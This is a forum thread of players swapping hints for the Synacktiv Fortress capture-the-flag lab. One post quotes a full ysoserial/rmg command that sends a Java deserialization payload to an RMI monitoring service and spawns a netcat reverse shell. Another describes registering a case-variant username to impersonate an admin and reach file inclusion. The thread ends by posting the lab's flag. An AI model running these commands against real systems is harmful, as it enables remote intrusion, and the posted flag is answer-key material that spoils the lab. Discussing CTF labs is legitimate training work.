SYNACKTIV Fortress
by yivador274 - Monday January 8, 2024 at 09:18 AM
#1
Hi.

Could anybody give some hints to take the 2nd flag - AcedDC?
I know it is about deserialization in the monitoring srv. But I can't craft the right msg for that. (I already know the token)
#2
(Jan 08, 2024, 09:58 AM)ElBakhaw Wrote: I don't remember 100% but I have this:

senddata()

proxychains -q java -jar rmg-4.4.1-jar-with-dependencies.jar serial 172.22.1.250 1099 --yso /opt/ysoserial.jar --bound-name monitoring --signature 'String sendData(String dummy,Object dummy2)' CommonsCollections6 'netcat ip port -e /bin/bash'

Thx a lot. I did it.
#3
Now I'm stuck after the VPN connection. There is a very laggy squid. Is it about some exploit on squid or not?
#4
Any hints for the squid part?
#5
Thx. I already did it yesterday.
So my previous question is not relevant anymore )
#6
Stuck on the first flag. I think I need to become ellonmusk, but how? Have access to _profiler, looking for clues. Can someone give me a hint plz?

#7
(Jan 16, 2024, 09:42 PM)fl00d777 Wrote: Stuck on the first flag. I think I need to become ellonmusk, but how? Have access to _profiler, looking for clues. Can someone give me a hint plz?
Yes, you are right, you need to become elonmusk. On code analysis, the fact stands out that new users cannot be elonmusk.

However, this string comparison also yields the vulnerability: you can register as EloNMusK, for example. This way you can also log in with your new user and impersonate that user.

Then grab the admincontroller and analyze its code; you can see how it downloads files... this way you can achieve LFI and leverage this for further enumeration.

And finally the flag.
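The comparison mismatch described in post #7, as an added example that is not part of the original thread and not the target application's code. It assumes the registration check compares names exactly while a later check ignores case, and shows the canonicalising fix plus an audit for accounts that already shadow a reserved name; all function names are hypothetical.

```python
import unicodedata
from collections import defaultdict

RESERVED = {"elonmusk"}  # reserved name taken from the thread


def canonical(name):
    """One canonical form for every comparison: NFKC, then case folding."""
    return unicodedata.normalize("NFKC", name).casefold()


def register_weak(users, name):
    """Assumed flawed check: exact match only, so 'EloNMusK' is accepted."""
    if name in RESERVED or name in users:
        return False
    users.append(name)
    return True


def register_hardened(users, name):
    """Reject any name whose canonical form is reserved or already taken."""
    key = canonical(name)
    if key in RESERVED or key in {canonical(u) for u in users}:
        return False
    users.append(name)
    return True


def is_privileged(name):
    """Assumed downstream check that ignores case (the other half of the mismatch)."""
    return canonical(name) in RESERVED


def audit(users):
    """Detection: report existing accounts that shadow a reserved name or each other."""
    groups = defaultdict(list)
    for u in users:
        groups[canonical(u)].append(u)
    return {k: v for k, v in groups.items()
            if len(v) > 1 or (k in RESERVED and v != [k])}


if __name__ == "__main__":
    weak, hard = [], []
    for n in ["alice", "EloNMusK", "Alice"]:  # constructed sample registrations
        register_weak(weak, n)
        register_hardened(hard, n)
    print("weak:", weak, "audit:", audit(weak))
    print("hardened:", hard, "audit:", audit(hard))
```

The fix is to apply the same canonical form at registration, login and authorization, and to enforce uniqueness on that form in the datastore rather than in application code alone.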
#8
Hi,

Stuck after the second flag.

Successfully did the attack with Java.
But stuck on the machine, couldn't find any interesting file or program.

Can someone give me a nudge?
#9
writeup:
https://gatogamer1155.github.io/fortress/synacktiv/
to open:
SYNACKTIV{S3Linux_1s_w@y_bett3r}